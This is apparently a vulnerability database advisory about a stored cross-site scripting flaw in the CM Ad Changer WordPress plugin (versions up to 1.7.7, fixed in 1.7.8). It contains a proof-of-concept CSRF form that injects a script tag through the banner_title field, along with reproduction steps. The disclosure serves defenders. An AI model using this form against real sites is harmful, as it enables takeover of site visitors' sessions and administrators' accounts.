CM Ad Changer <= 1.7.7 - Stored Cross-Site Scripting (XSS)

An Stored Cross Site Scripting was reported by the author to CM Ad Plugins under which an unprivileged user can trigger a Stored XSS to perform malicious actions or any attacker could send a crafted link (CSRF) which can trigger the Stored XSS.
Proof of Concept
1) Go to CM Ad changers -> Campaigns

2) Create a Campaign. Enter whatever you want in Campaign settings, in the next tab "Campaign Banners", select an Image in Campaign images and in Banner Title enter this payload

3) Enter Save & Payload triggers everytime you Return.

Attacker Can Make a Payload File containing the following:

    <h1> Click The button below. POC By Aaditya Purani:: CM AD Changer 1.7.7 </h1>   
    <form action="{TARGET_ID}" method="POST">
      <input type="hidden" name="campaign_id" value="1" />
      <input type="hidden" name="title" value="Hacked by Aaditya" />
      <input type="hidden" name="comment" value="" />
      <input type="hidden" name="link" value="" />
      <input type="hidden" name="status" value="on" />
      <input type="hidden" name="banner_display_method" value="selected" />
      <input type="hidden" name="banner_filename[]" value="yourpicvalue.jpg" />
      <input type="hidden" name="banner_title[]" value="</script><script>confirm(/aaditya/)</script>" />
      <input type="hidden" name="banner_title_tag[]" value="" />
      <input type="hidden" name="banner_tag[]" value="" />
      <input type="hidden" name="banner_link[]" value="" />
      <input type="hidden" name="banner_weight[]" value="0" />
      <input type="hidden" name="selected_banner" value="yourpicvalue.jpg" />
      <input type="hidden" name="submit" value="Save" />
      <input type="submit" value="Submit request" />

This will Trigger Stored XSS at banner_title Parameter.

Affects Plugin

fixed in version 1.7.8




Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)


Submitter Aaditya Purani
Submitter Website
Submitter Twitter aaditya_purani
Views 6456
Verified No


Publicly Published 2016-06-09 (about 4 years ago)
Added 2016-06-13 (about 4 years ago)
Last Updated 2019-11-01 (8 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin